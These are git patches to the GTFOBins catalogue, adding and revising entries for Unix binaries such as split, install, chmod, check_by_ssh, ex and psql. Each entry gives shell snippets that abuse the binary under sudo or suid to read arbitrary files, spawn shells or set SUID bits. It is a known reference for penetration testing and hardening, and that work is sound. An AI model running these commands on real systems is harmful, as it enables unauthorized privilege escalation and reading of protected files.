15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/comm.md diff --git a/_gtfobins/comm.md b/_gtfobins/comm.md new file mode 100644 index 0000000..29551d9 --- /dev/null +++ b/_gtfobins/comm.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + comm $LFILE /dev/null 2>/dev/null + suid: + - code: | + LFILE=file_to_read + comm $LFILE /dev/null 2>/dev/null + sudo: + - code: | + LFILE=file_to_read + sudo comm $LFILE /dev/null 2>/dev/null +--- From 5a3e672d23abf11588be7cb61931b1d447546f31 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 23/43] New command: csplit --- _gtfobins/csplit.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/csplit.md diff --git a/_gtfobins/csplit.md b/_gtfobins/csplit.md new file mode 100644 index 0000000..7b8927c --- /dev/null +++ b/_gtfobins/csplit.md @@ -0,0 +1,18 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 + suid: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 + sudo: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 +--- From 146b146cd3b8d80bbb4d6525a8ddd87926e535c3 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 24/43] New command: install --- _gtfobins/install.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 _gtfobins/install.md diff --git a/_gtfobins/install.md b/_gtfobins/install.md new file mode 100644 index 0000000..a6c9297 --- /dev/null +++ b/_gtfobins/install.md @@ -0,0 +1,13 @@ +--- +functions: + suid: + - code: | + TF=$(mktemp) + install -m 4755 $TF + $TF -p + sudo: + - code: | + TF=$(mktemp) + sudo install -m 4755 $TF + $TF -p +--- From 9e593b6ac0e494549d0d179b7838b81bfa68708b Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 25/43] New command: join --- _gtfobins/join.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/join.md diff --git a/_gtfobins/join.md b/_gtfobins/join.md new file mode 100644 index 0000000..50dff52 --- /dev/null +++ b/_gtfobins/join.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + join -a 2 /dev/null $LFILE + suid: + - code: | + LFILE=file_to_read + join -a 2 /dev/null $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo join -a 2 /dev/null $LFILE +--- From 28b67bdfd57ca849c05eefb811a480fbb9750dbf Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 26/43] New command: paste --- _gtfobins/paste.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/paste.md diff --git a/_gtfobins/paste.md b/_gtfobins/paste.md new file mode 100644 index 0000000..dd84bcb --- /dev/null +++ b/_gtfobins/paste.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + paste $LFILE + suid: + - code: | + LFILE=file_to_read + paste $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo paste $LFILE +--- From c88e461484454cb7f5e8bd360fe010d330c50efd Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 27/43] New command: pr --- _gtfobins/pr.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/pr.md diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md new file mode 100644 index 0000000..248c961 --- /dev/null +++ b/_gtfobins/pr.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by additional output. +functions: + file-read: + - code: | + LFILE=file_to_read + pr $LFILE + suid: + - code: | + LFILE=file_to_read + pr $LFILE + sudo: + - code: | + LFILE=file_to_read + pr $LFILE +--- From cb7cb672f26ac2f5e06c7bcf4f4ed4f52ff23535 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 28/43] New command: split --- _gtfobins/split.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 _gtfobins/split.md diff --git a/_gtfobins/split.md b/_gtfobins/split.md new file mode 100644 index 0000000..cd805c6 --- /dev/null +++ b/_gtfobins/split.md @@ -0,0 +1,27 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + TF=$(mktemp) + split $LFILE $TF + cat $TF* + command: + - description: Command execution using an existing or new created file. + - code: | + COMMAND=id + TF=$(mktemp) + split --filter=$COMMAND $TF + - description: Command execution using stdin (and close it directly). + code: | + COMMAND=id + echo | split --filter=$COMMAND /dev/stdin + shell: + - code: | + split --filter=bash /dev/stdin + sudo: + - code: | + split --filter=bash /dev/stdin +--- + + From de10e4761e05be39fc1b4aa4ade51b862c038f44 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 12:09:04 +0100 Subject: [PATCH 29/43] Added missing shell file --- _gtfobins/install.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/_gtfobins/install.md b/_gtfobins/install.md index a6c9297..9fad402 100644 --- a/_gtfobins/install.md +++ b/_gtfobins/install.md @@ -3,11 +3,11 @@ functions: suid: - code: | TF=$(mktemp) - install -m 4755 $TF + install -m 4755 `which sh` $TF $TF -p sudo: - code: | TF=$(mktemp) - sudo install -m 4755 $TF + sudo install -m 4755 `which sh` $TF $TF -p --- From 286775860abebcc9c2344f95113566d59bac0390 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 12:12:08 +0100 Subject: [PATCH 30/43] Fixed syntax error --- _gtfobins/split.md | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/_gtfobins/split.md b/_gtfobins/split.md index cd805c6..c51cd22 100644 --- a/_gtfobins/split.md +++ b/_gtfobins/split.md @@ -8,7 +8,7 @@ functions: cat $TF* command: - description: Command execution using an existing or new created file. - - code: | + code: | COMMAND=id TF=$(mktemp) split --filter=$COMMAND $TF @@ -23,5 +23,3 @@ functions: - code: | split --filter=bash /dev/stdin --- - - From ee8cce63f925d45816c662b0a96e9e6d96819d62 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 19:32:15 +0100 Subject: [PATCH 31/43] Replace command with shell in check_by_ssh --- _gtfobins/check_by_ssh.md | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md index e00730e..5660689 100644 --- a/_gtfobins/check_by_ssh.md +++ b/_gtfobins/check_by_ssh.md @@ -2,20 +2,10 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: - command: - - code: | - COMMAND=id - OUTPUT=output_file - TF=$(mktemp) - echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF - check_by_ssh -F $TF -H localhost -C something - cat $OUTPUT + shell: + - description: The shell will only last 10 seconds. + code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx sudo: - - code: | - COMMAND=id - OUTPUT=output_file - TF=$(mktemp) - echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF - sudo check_by_ssh -F $TF -H localhost -C something - cat $OUTPUT + - description: The shell will only last 10 seconds. + code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx --- From 4b2100bfae177ee4fc3232c65a46c1eb9b5f3205 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 19:53:16 +0100 Subject: [PATCH 32/43] Fix check_log --- _gtfobins/check_log.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md index 023cdbd..40fd225 100644 --- a/_gtfobins/check_log.md +++ b/_gtfobins/check_log.md @@ -11,12 +11,11 @@ functions: file-write: - code: | LFILE=file_to_write - INPUT=output_file + INPUT=input_file check_log -F $INPUT -O $LFILE sudo: - code: | LFILE=file_to_write - INPUT=output_file - umask 022 + INPUT=input_file sudo check_log -F $INPUT -O $LFILE --- From dc3de20e8437220049149409ff3c982795da2ef3 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 19:57:16 +0100 Subject: [PATCH 33/43] Add note about column --- _gtfobins/column.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/_gtfobins/column.md b/_gtfobins/column.md index af67980..80a173c 100644 --- a/_gtfobins/column.md +++ b/_gtfobins/column.md @@ -1,4 +1,6 @@ --- +description: | + `column` expects textual data. functions: file-read: - code: | From 6a6485c44b204e7cebb8ebeb93d8a353bf7692c9 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:13:01 +0100 Subject: [PATCH 34/43] Fix ex shell path and remove suid --- _gtfobins/ex.md | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md index 1029504..49ebb37 100644 --- a/_gtfobins/ex.md +++ b/_gtfobins/ex.md @@ -3,7 +3,7 @@ functions: shell: - code: | ex - !sh + !/bin/sh file-write: - code: | ex file_to_write @@ -20,9 +20,5 @@ functions: sudo: - code: | sudo ex - !sh - suid: - - code: | - ./ex - !sh -p + !/bin/sh --- From 5102eccdfcc0a99fdc5d71b19b7685522fbf4772 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:13:01 +0100 Subject: [PATCH 35/43] Fix psql shell path and remove suid --- _gtfobins/psql.md | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md index ae7b794..40ca33f 100644 --- a/_gtfobins/psql.md +++ b/_gtfobins/psql.md @@ -1,18 +1,14 @@ --- +description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: shell: - code: | psql \? - !sh - suid: - - code: | - psql - \? - !sh -p + !/bin/sh sudo: - code: | psql \? - !sh + !/bin/sh --- From 54c20a1349d9bee39ec7c0bac21aefaef92ff338 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:41:49 +0100 Subject: [PATCH 36/43] Improve the description of ss --- _gtfobins/ss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md index 28d4bce..62d863e 100644 --- a/_gtfobins/ss.md +++ b/_gtfobins/ss.md @@ -1,6 +1,6 @@ --- description: | - The read file content is limited to the first line and corrupted by an error message. + The file content is actually parsed so only a part of the first line is returned as a part of an error message. functions: file-read: - code: | From dd16d538ce8d216bf63d3092aaeabc7837f4cf12 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:44:24 +0100 Subject: [PATCH 37/43] Improve the description of ssh-keyscan --- _gtfobins/ssh-keyscan.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md index e5bb84c..e113ca5 100644 --- a/_gtfobins/ssh-keyscan.md +++ b/_gtfobins/ssh-keyscan.md @@ -1,6 +1,6 @@ --- description: | - The read file content is corrupted by error prints. + The file content is actually parsed so only a part of each line is returned as a part of an error message. functions: file-read: - code: | From b05a84474b93939962c5aed2cf1fdee0af1a357a Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:48:00 +0100 Subject: [PATCH 38/43] Improve the description of troff --- _gtfobins/troff.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md index 52a2bdc..a48f957 100644 --- a/_gtfobins/troff.md +++ b/_gtfobins/troff.md @@ -1,6 +1,6 @@ --- description: | - The read file content is corrupted by error prints. + The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`. functions: file-read: - code: | From 7cfac08921b4d170ef754ef9a5888bf10e8253ef Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:54:05 +0100 Subject: [PATCH 39/43] Improve the description of nroff --- _gtfobins/nroff.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md index 38cc263..05d6b70 100644 --- a/_gtfobins/nroff.md +++ b/_gtfobins/nroff.md @@ -1,7 +1,7 @@ --- functions: file-read: - - description: The read file content is corrupted by arbitrary newlines. + - description: The file is typeset and some warning messages may appear. code: | LFILE=file_to_read nroff $LFILE From c6502e8ddcfb48a60036f879f0d863e602c3cac1 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 20:59:40 +0100 Subject: [PATCH 40/43] Use base64 in basenc --- _gtfobins/basenc.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md index b8f2a59..0a9f6ca 100644 --- a/_gtfobins/basenc.md +++ b/_gtfobins/basenc.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - basenc --base16 $LFILE | basenc -d --base16 + basenc --base64 $LFILE | basenc -d --base64 suid: - code: | LFILE=file_to_read - basenc --base16 $LFILE | basenc -d --base16 + basenc --base64 $LFILE | basenc -d --base64 sudo: - code: | LFILE=file_to_read - sudo basenc --base16 $LFILE | basenc -d --base16 + sudo basenc --base64 $LFILE | basenc -d --base64 --- From 2475ea0a5ae3984bc9654645a542b6544510148d Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 21:09:50 +0100 Subject: [PATCH 41/43] Improve pr --- _gtfobins/pr.md | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md index 248c961..a497a67 100644 --- a/_gtfobins/pr.md +++ b/_gtfobins/pr.md @@ -1,17 +1,16 @@ --- -description: | - The read file content is corrupted by additional output. +description: Some bytes are altered so it might not be suitable for binary files. functions: file-read: - code: | LFILE=file_to_read - pr $LFILE + pr -T $LFILE suid: - code: | LFILE=file_to_read - pr $LFILE + pr -T $LFILE sudo: - code: | LFILE=file_to_read - pr $LFILE + pr -T $LFILE --- From fbe4b4289099da6b9b123852ac6186debcfd6c71 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 21:15:58 +0100 Subject: [PATCH 42/43] Improve split --- _gtfobins/split.md | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/_gtfobins/split.md b/_gtfobins/split.md index c51cd22..297bdb1 100644 --- a/_gtfobins/split.md +++ b/_gtfobins/split.md @@ -7,7 +7,7 @@ functions: split $LFILE $TF cat $TF* command: - - description: Command execution using an existing or new created file. + - description: Command execution using an existing or newly created file. code: | COMMAND=id TF=$(mktemp) @@ -17,9 +17,11 @@ functions: COMMAND=id echo | split --filter=$COMMAND /dev/stdin shell: - - code: | - split --filter=bash /dev/stdin + - description: The shell prompt is not printed. + code: | + split --filter=/bin/sh /dev/stdin sudo: - - code: | - split --filter=bash /dev/stdin + - description: The shell prompt is not printed. + code: | + split --filter=/bin/sh /dev/stdin --- From c80e83c3c59ca6734c40476ddf1415a041d340ae Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 20 Dec 2020 21:23:28 +0100 Subject: [PATCH 43/43] Make install similar to chmod --- _gtfobins/chmod.md | 6 +++--- _gtfobins/install.md | 9 +++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md index 61e3361..0fc3dde 100644 --- a/_gtfobins/chmod.md +++ b/_gtfobins/chmod.md @@ -1,12 +1,12 @@ --- -description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. +description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file. functions: suid: - code: | LFILE=file_to_change - ./chmod 0777 $LFILE + ./chmod 6777 $LFILE sudo: - code: | LFILE=file_to_change - sudo chmod 0777 $LFILE + sudo chmod 6777 $LFILE --- diff --git a/_gtfobins/install.md b/_gtfobins/install.md index 9fad402..a10c425 100644 --- a/_gtfobins/install.md +++ b/_gtfobins/install.md @@ -1,13 +1,14 @@ --- +description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file. functions: suid: - code: | + LFILE=file_to_change TF=$(mktemp) - install -m 4755 `which sh` $TF - $TF -p + ./install -m 6777 $LFILE $TF sudo: - code: | + LFILE=file_to_change TF=$(mktemp) - sudo install -m 4755 `which sh` $TF - $TF -p + sudo install -m 6777 $LFILE $TF ---